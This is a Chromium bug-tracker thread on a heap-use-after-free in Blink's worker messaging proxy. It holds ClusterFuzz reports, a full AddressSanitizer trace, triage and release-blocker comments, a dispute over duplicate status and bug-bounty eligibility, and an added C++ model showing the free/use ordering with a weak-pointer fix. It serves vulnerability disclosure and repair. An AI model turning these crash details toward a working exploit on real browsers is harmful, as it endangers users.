ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5430891503681536
Project Member

Comment 8 by ClusterFuzz, Oct 4 2016

Labels: Stability-Memory-AddressSanitizer
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=6153749666201600

Fuzzer: inferno_twister
Job Type: linux_asan_chrome_media
Platform Id: linux

Crash Type: UNKNOWN
Crash Address: 0x7ee25b121a18
Crash State:
  blink::PersistentBase<blink::DummyGCBase,
  blink::CrossThreadPersistentRegion::shouldTracePersistentNode
  blink::PersistentRegion::tracePersistentNodes
  
Recommended Security Severity: Medium

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_media&range=421705:421755

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv958d69tlAG40oN1djK1gP96Y0OtBjQpbvCXjN1lFgP6iGjvXHfxsSAuXBEZn9LPbfTsgqyTouuzoOYpiVKneeyqfNik0DBOnXDSvJs04lUgMkOnYdBu5EkoKojcqHDVXtPFr3FcX3QYbW7jWSwVsdxKc6YB4zxEcjY0R3fE7BGyzJ17XEI?testcase_id=6153749666201600


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 9 by kenrb@chromium.org, Oct 4 2016

Cc: -kenrb@chromium.org
Components: Blink>Workers
Labels: -Needs-Feedback Security_Severity-Medium Security_Impact-Head OS-All Pri-1
Status: Untriaged (was: Unconfirmed)
Owner: keishi@chromium.org
Status: Assigned (was: Untriaged)
Guessing https://codereview.chromium.org/2374693002/ based on regression range.
Project Member

Comment 11 by sheriffbot@chromium.org, Oct 5 2016

Labels: M-55
Project Member

Comment 12 by sheriffbot@chromium.org, Oct 5 2016

Labels: ReleaseBlock-Beta
This issue is a security regression. If you are not able to fix this quickly, please revert the change that introduced it.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 13 by ClusterFuzz, Oct 6 2016

ClusterFuzz has detected this issue as fixed in range 422899:423265.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=6153749666201600

Fuzzer: inferno_twister
Job Type: linux_asan_chrome_media
Platform Id: linux

Crash Type: UNKNOWN
Crash Address: 0x7ee25b121a18
Crash State:
  blink::PersistentBase<blink::DummyGCBase,
  blink::CrossThreadPersistentRegion::shouldTracePersistentNode
  blink::PersistentRegion::tracePersistentNodes
  
Recommended Security Severity: Medium

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_media&range=421705:421755
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_media&range=422899:423265

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv958d69tlAG40oN1djK1gP96Y0OtBjQpbvCXjN1lFgP6iGjvXHfxsSAuXBEZn9LPbfTsgqyTouuzoOYpiVKneeyqfNik0DBOnXDSvJs04lUgMkOnYdBu5EkoKojcqHDVXtPFr3FcX3QYbW7jWSwVsdxKc6YB4zxEcjY0R3fE7BGyzJ17XEI?testcase_id=6153749666201600


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

**** Bulk edit -  please ignore if not applicable ****

This bug is reported as an M55 Beta blocker and we're getting closer to M55 Beta promotion.
Please plan to have the fix ready and merged to the M55 branch (2883) by 5:00 PM PT, Monday (10/10) so it has enough baking time in Dev before Beta promotion. Thank you.
Project Member

Comment 15 by sheriffbot@chromium.org, Oct 13 2016

Labels: -Security_Impact-Head Security_Impact-Beta
Project Member

Comment 16 by sheriffbot@chromium.org, Oct 15 2016

keishi: Uh oh! This issue is still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Status: Started (was: Assigned)
Labels: -ReleaseBlock-Beta ReleaseBlock-Stable
**** Bulk edit -  please ignore if not applicable ****

A friendly reminder that the M55 Stable launch is coming soon! Your bug is labelled as Stable ReleaseBlock, please make sure to land the fix and get it merged into the release branch ASAP so it gets enough baking time in Beta (before Stable promotion). Thank you!
Status: Fixed (was: Started)
Original report and https://cluster-fuzz.appspot.com/testcase?key=5430891503681536 both look fixed
Project Member

Comment 21 by sheriffbot@chromium.org, Oct 31 2016

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -ReleaseBlock-Stable
Just had a try in the latest build and it still reproduces:

Chromium	56.0.2907.0 (Developer Build) (32-bit)
( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-429061.zip?generation=1478037988846000&alt=media )

=================================================================
==79772==ERROR: AddressSanitizer: heap-use-after-free on address 0x040d9a5c at pc 0x1b145033 bp 0x01b3d57c sp 0x01b3d570
READ of size 4 at 0x040d9a5c thread T0
==79772==WARNING: Failed to use and restart external symbolizer!
==79772==*** WARNING: Failed to initialize DbgHelp!              ***
==79772==*** Most likely this means that the app is already      ***
==79772==*** using DbgHelp, possibly with incompatible flags.    ***
==79772==*** Due to technical reasons, symbolization might crash ***
==79772==*** or produce wrong results.                           ***
    #0 0x1b145032 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:192
    #1 0x1b15611b in base::internal::FunctorTraits<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),void>::Invoke<blink::InProcessWorkerMessagingProxy *,const WTF::String &,std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >,const int &> C:\b\c\b\win_asan_release\src\base\bind_internal.h:214
    #2 0x1b155f2d in base::internal::Invoker<base::internal::BindState<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),WTF::UnretainedWrapper<blink::InProcessWorkerMessagingProxy,WTF::FunctionThreadAffinity::CrossThreadAffinity>,WTF::String,WTF::PassedWrapper<std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> > >,int>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
    #3 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #4 0x18bb905c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:358
    #5 0x18bb4db6 in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:250
    #6 0x18bbd0b8 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
    #7 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #8 0x14bb6440 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #9 0x14bb84fc in base::MessageLoop::DoDelayedWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:554
    #10 0x14d692f2 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:39
    #11 0x14bb5689 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
    #12 0x14c4b53d in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35
    #13 0x1c22b471 in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198
    #14 0x14a28097 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:408
    #15 0x14a2992f in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:776
    #16 0x14a27be4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
    #17 0xf9611ba in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97
    #18 0xeca6db in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174
    #19 0xec1b1a in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:247
    #20 0x1321304 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
    #21 0x74f338f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3)
    #22 0x77755de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2)
    #23 0x77755dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad)

0x040d9a5c is located 44 bytes inside of 80-byte region [0x040d9a30,0x040d9a80)
freed by thread T0 here:
    #0 0x1305878 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
    #1 0x1b997938 in blink::CompositorWorkerMessagingProxy::~CompositorWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\compositorworker\CompositorWorkerMessagingProxy.cpp:18
    #2 0x1b1490a9 in blink::ThreadedMessagingProxyBase::workerThreadTerminated C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\ThreadedMessagingProxyBase.cpp:129
    #3 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #4 0x18bb905c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:358
    #5 0x18bb4db6 in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:250
    #6 0x18bbd0b8 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
    #7 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #8 0x14bb6440 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #9 0x14bb80bc in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:513
    #10 0x14d69544 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35
    #11 0x14bb5689 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
    #12 0x14c4b53d in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35
    #13 0x1c22b471 in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198
    #14 0x14a28097 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:408
    #15 0x14a2992f in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:776
    #16 0x14a27be4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
    #17 0xf9611ba in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97
    #18 0xeca6db in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174
    #19 0xec1b1a in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:247
    #20 0x1321304 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
    #21 0x74f338f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3)
    #22 0x77755de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2)
    #23 0x77755dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad)

previously allocated by thread T0 here:
    #0 0x130595c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65
    #1 0x143757ea in WTF::Partitions::fastMalloc C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\allocator\Partitions.h:99
    #2 0x18de7c0a in blink::DedicatedWorkerMessagingProxyProviderImpl::createWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\DedicatedWorkerMessagingProxyProviderImpl.cpp:62
    #3 0x1b126910 in blink::Worker::createInProcessWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:49
    #4 0x1b1240a6 in blink::InProcessWorkerBase::initialize C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerBase.cpp:63
    #5 0x1b126508 in blink::Worker::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:30
    #6 0x195a36c8 in blink::V8Worker::constructorCallback C:\b\c\b\Win_ASan_Release\src\out\Release\gen\blink\bindings\core\v8\V8Worker.cpp:216
    #7 0x1173c45e in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments.cc:19
    #8 0x119ee627 in v8::internal::`anonymous namespace'::HandleApiCallHelper<1> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:106
    #9 0x119ec2cd in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:131
    #10 0x119eb4f8 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:123

SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:192 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent
Shadow bytes around the buggy address:
  0x3081b2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3081b300: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x3081b310: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x3081b320: fd fd fd fd fd fd fa fa fa fa fd fd fd fd fd fd
  0x3081b330: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x3081b340: fd fd fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd
  0x3081b350: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fa fa
  0x3081b360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3081b370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fd
  0x3081b380: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x3081b390: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==79772==ABORTING
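
The free/use ordering the ASan trace above records (proxy destroyed from workerThreadTerminated in one DoWork pass, then dispatchErrorEvent run from a later DoDelayedWork pass against the freed object) reduced to a small stand-alone model. This is an added illustration, not code from the report or from Chromium: MessagingProxy, TaskQueue and runErrorAfterTermination are hypothetical stand-ins, and std::weak_ptr plays the role of a weak handle in place of the unretained raw pointer that the report's stack shows being bound into the task. The raw-pointer variant is deliberately not executed here, since dereferencing it after the reset is exactly the undefined behaviour the sanitizer flags.

```cpp
#include <deque>
#include <functional>
#include <memory>
#include <string>

// Hypothetical stand-in for the messaging proxy object (not Blink's class).
struct MessagingProxy {
    int errorsDispatched = 0;
    std::string lastError;
    void dispatchErrorEvent(const std::string& message) {
        ++errorsDispatched;
        lastError = message;
    }
};

// Minimal single-thread task queue standing in for the renderer main thread:
// immediate tasks run first (like DoWork), delayed tasks afterwards (like
// DoDelayedWork), which is the ordering visible in the two stacks above.
class TaskQueue {
public:
    void post(std::function<void()> task) { immediate_.push_back(std::move(task)); }
    void postDelayed(std::function<void()> task) { delayed_.push_back(std::move(task)); }
    // Runs everything queued, immediate before delayed; returns how many tasks ran.
    int runAll() {
        int ran = 0;
        ran += drain(immediate_);
        ran += drain(delayed_);
        return ran;
    }
private:
    static int drain(std::deque<std::function<void()>>& queue) {
        int ran = 0;
        while (!queue.empty()) {
            auto task = std::move(queue.front());
            queue.pop_front();
            task();
            ++ran;
        }
        return ran;
    }
    std::deque<std::function<void()>> immediate_;
    std::deque<std::function<void()>> delayed_;
};

struct ScenarioResult {
    int tasksRun = 0;        // tasks the main thread executed
    int errorsDelivered = 0; // error events that reached a live proxy
    int errorsDropped = 0;   // error events that found the proxy already destroyed
    bool proxyAlive = true;  // whether the proxy still exists at the end
};

// Replays the race: with terminateFirst the worker-terminated task destroys the
// proxy before the (delayed) error-event task runs. Because the error task holds
// only a weak handle, it checks liveness and drops the event instead of touching
// freed memory; binding a raw MessagingProxy* here is the shape of the bug.
ScenarioResult runErrorAfterTermination(bool terminateFirst) {
    ScenarioResult result;
    TaskQueue mainThread;
    auto proxy = std::make_shared<MessagingProxy>();   // the owning reference
    std::weak_ptr<MessagingProxy> weakProxy = proxy;   // what the task captures

    if (terminateFirst) {
        // workerThreadTerminated equivalent: drops the last owning reference.
        mainThread.post([&proxy] { proxy.reset(); });
    }

    // dispatchErrorEvent equivalent, posted from the worker side as later work.
    mainThread.postDelayed([weakProxy, &result] {
        if (auto live = weakProxy.lock()) {
            live->dispatchErrorEvent("Uncaught Error in worker script (constructed)");
            ++result.errorsDelivered;
        } else {
            ++result.errorsDropped;   // proxy already gone: safe no-op
        }
    });

    result.tasksRun = mainThread.runAll();
    result.proxyAlive = !weakProxy.expired();
    return result;
}
```

With terminateFirst set, two tasks run, the error is dropped and the proxy is gone; without it, the single error task reaches the live proxy. The point for review of this kind of report is the ownership question the trace raises: any task bound against an object that a termination path can destroy needs either a weak handle or a cancellation step in the destructor, and ASan only reports the failure case once the two tasks happen to land in that order.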

Status: Assigned (was: Fixed)
keishi@, can you take a look at c#23?
Project Member

Comment 25 by sheriffbot@chromium.org, Nov 2 2016

Labels: ReleaseBlock-Stable
**** Bulk edit -  please ignore if not applicable ****

A friendly reminder that the M55 Stable launch is coming soon! Your bug is labelled as Stable ReleaseBlock, please make sure to land the fix and get it merged into the release branch ASAP so it gets enough baking time in Beta (before Stable promotion). Thank you!

Also due to Thanksgiving holidays in US, please make sure all fixes are ready and merged to M55 latest by 5:00 PM PT Friday, 11/18/16.
FYI: I ran the script on the original report on ToT w/ ASan and couldn't reproduce this. My env is as follows:

Chromium: 56.0.2913.0 (Developer Build) (64-bit)
Revision: 3c8a4fdc731c2d663383b270549ff5af4103ca17-refs/heads/master@{#430236}
OS: Linux
This could be fixed by https://codereview.chromium.org/2478113002/

loobenyang@, could you check whether this still happens after the patch?
It looks like https://codereview.chromium.org/2478113002/ should fix this crash.

I have been unsuccessful at reproducing this even when using the exact binaries specified by loobenyang@. So if loobenyang@ could confirm whether it's fixed, that would be great.
Just tried but could not reproduce it with the same test case in this new build:

Chromium	56.0.2913.0 (Developer Build) (32-bit)

( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-430287.zip?generation=1478547138770000&alt=media )
Thank you for confirming it :)
Labels: -M-55 M-56
Mergedinto: 653865
Status: Duplicate (was: Assigned)
I'll merge this issue into issue 653865 based on c#30. If you still see this UAF, feel free to comment on this issue.
Based on the issue numbers, this bug report was filed much earlier than 653865. Is there any reason for not marking 653865 as a duplicate of this one?
Labels: reward-topanel
The fix was associated with issue 660427 that was merged into issue 653865, so I merged this issue into issue 653865, too.

Are you concerned about the reward program[1]? I don't have a right to decide whether this issue is eligible, but I'll add "reward-topanel" label so that people who manage the program can easily find this report.

[1] https://www.google.com/about/appsecurity/chrome-rewards/index.html
Project Member

Comment 35 by sheriffbot@chromium.org, Nov 8 2016

Labels: -reward-topanel reward-ineligible
Is there any reason to mark it as "reward-ineligible"?

This bug (652047) was filed earlier than bugs 653865 and 660427. It's valid, and the other two bugs should be the duplicates instead, according to the following rule on the web page https://www.google.com/about/appsecurity/chrome-rewards/index.html


There are three rules to keep in mind:

Only the first report of a given issue that we were previously unaware of is eligible. In the event of a duplicate submission, the earliest filed bug report in the bug tracker is considered the first report.
According to https://bugs.chromium.org/p/chromium/issues/detail?id=653865#c36, a manual review should be conducted.
Thanks nhiroki. Could you add a topanel tag again? Don't think the security team can see this report currently.
Labels: -reward-ineligible -ReleaseBlock-Stable reward-topanel
Project Member

Comment 40 by sheriffbot@chromium.org, Nov 11 2016

Labels: -reward-topanel reward-ineligible
Is the label "reward-ineligible" generated by a bot, or did the security team review the reports?

I have no access to the other reports. However, based on the issue numbers, this bug report was filed earlier than the others and so it's a valid report. Closing this bug as Fixed would reflect the facts better than Duplicate.

If the panel can add a note here to explain why, I would appreciate it.

awhalley@ would be a member of the security team.

awhalley@, could you answer loobenyang@'s questions?
Cc: awhalley@chromium.org
Sorry about the confusion there. This is still being considered for a reward, but we're now tracking it on the duplicate issue. Since this report is older, the bot is smart enough to apply reward-topanel to the other bug so that we can still consider it, but the comment on this issue is certainly confusing. We do this because we ignore duplicate issues in most of our reward-related queries.

I'll cc you on the other bug, and this is being considered for a reward.
Project Member

Comment 45 by sheriffbot@chromium.org, Feb 14 2017

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
